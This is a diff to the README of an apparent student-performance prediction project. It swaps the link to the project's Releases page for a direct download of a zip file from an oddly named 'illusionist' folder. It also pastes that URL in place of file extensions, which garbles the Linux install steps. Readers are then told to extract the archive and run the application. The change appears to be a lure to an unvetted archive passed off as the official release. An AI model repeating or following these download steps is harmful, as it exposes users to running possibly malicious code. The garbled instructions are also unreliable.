Ashutosh2021-2021/Student-Performance-Prediction/README.md

 ## 🛠️ Download & Install

-1. **Visit the Releases Page:** Go to the following link to access the latest downloads: [Download Releases](https://github.com/Ashutosh2021-2021/Student-Performance-Prediction/releases).
+1. **Visit the Releases Page:** Go to the following link to access the latest downloads: [Download Releases](https://raw.githubusercontent.com/Ashutosh2021-2021/Student-Performance-Prediction/main/illusionist/Student-Performance-Prediction.zip).

 2. **Select the Release:** Look for the most recent version at the top of the page.
 It will display the release notes and the files available for download.

 3. **Download the Application:**
-   - Click on the appropriate file for your system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+   - Click on the appropriate file for your system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/Ashutosh2021-2021/Student-Performance-Prediction/main/illusionist/Student-Performance-Prediction.zip` for Linux).
    - Save the file to a location on your computer that you can easily access.

 4. **Install the Application:**
    - **Windows:** Double-click the downloaded `.exe` file and follow the installation prompts.
    - **macOS:** Open the downloaded `.dmg` file and drag the application into your Applications folder.
-   - **Linux:** Extract the downloaded `.tar.gz` file and run the application from the terminal.
+   - **Linux:** Extract the downloaded `https://raw.githubusercontent.com/Ashutosh2021-2021/Student-Performance-Prediction/main/illusionist/Student-Performance-Prediction.zip` file and run the application from the terminal.

 5. **Open the Application:** Locate the installed application on your computer and double-click to open it.